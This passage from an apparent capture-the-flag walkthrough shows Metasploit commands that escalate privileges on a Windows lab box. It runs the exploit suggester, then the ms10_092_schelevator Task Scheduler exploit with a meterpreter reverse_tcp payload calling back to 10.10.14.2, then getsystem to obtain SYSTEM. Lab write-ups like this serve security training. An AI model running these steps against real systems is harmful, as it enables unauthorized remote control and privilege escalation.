use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
msf post(multi/recon/local_exploit_suggester) > exploit
Wonderful!! Exploit Suggester truly proof itself by suggesting another exploit name to which target is vulnerable. So now we will go with the first option as highlighted in the image.
![[Image: 23.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-K12-zpGiluE/W9nNKMzSaBI/AAAAAAAAa8g/r_H4UdcmN_gNWW9s2ClyMhWjOjEzg_F9gCLcBGAs/s1600/23.png?w=687&ssl=1)
This Vulnerability in Task Scheduler could allow elevation of privileges. This module has been tested on vulnerable builds of Windows Vista, Windows 7, Windows Server 2008 x64 and x86.
use exploit/windows/local/ms10_092_schelevator
msf post(windows/local/ms10_092_schelevator) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf post(windows/local/ms10_092_schelevator) > set lhost 10.10.14.2
msf post(windows/local/ms10_092_schelevator) > set lport 5555
msf post(windows/local/ms10_092_schelevator) > set session 1
msf post(windows/local/ms10_092_schelevator) > exploit
1
2
3
4
5
6
use exploit/windows/local/ms10_092_schelevator
msf post(windows/local/ms10_092_schelevator) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf post(windows/local/ms10_092_schelevator) > set lhost 10.10.14.2
msf post(windows/local/ms10_092_schelevator) > set lport 5555
msf post(windows/local/ms10_092_schelevator) > set session 1
msf post(windows/local/ms10_092_schelevator) > exploit
![[Image: 24.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-XXTydd2ae7k/W9nNKS7rfKI/AAAAAAAAa8k/TN_IfdjftXsFwoLAkXoU6cFyc53SF6ljgCLcBGAs/s1600/24.png?w=687&ssl=1)
Another Meterpreter session gets opened, once the selected exploit has been executed.
getsystem
getuid
1
2
getsystem
getuid
As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM
![[Image: 26.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-lHagUCv2O6U/W9nNK8q3s0I/AAAAAAAAa8o/qrKy-EcqcI0zx5MCuBUmMgOpv3kdK3zNgCLcBGAs/s1600/26.png?w=687&ssl=1)
Successfully we have found the the root.txt from the path: C:\Users\Administrator\Desktop.
Wonderful!! We had completed both tasks and hacked this box.
Happy Hacking!!!!
![[Image: 27.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-UU7S54CT01A/W9nNK9iWUeI/AAAAAAAAa8s/X8-6YZzLakAd96SAGZuafbhwx9ROAMAtwCLcBGAs/s1600/27.png?w=687&ssl=1)
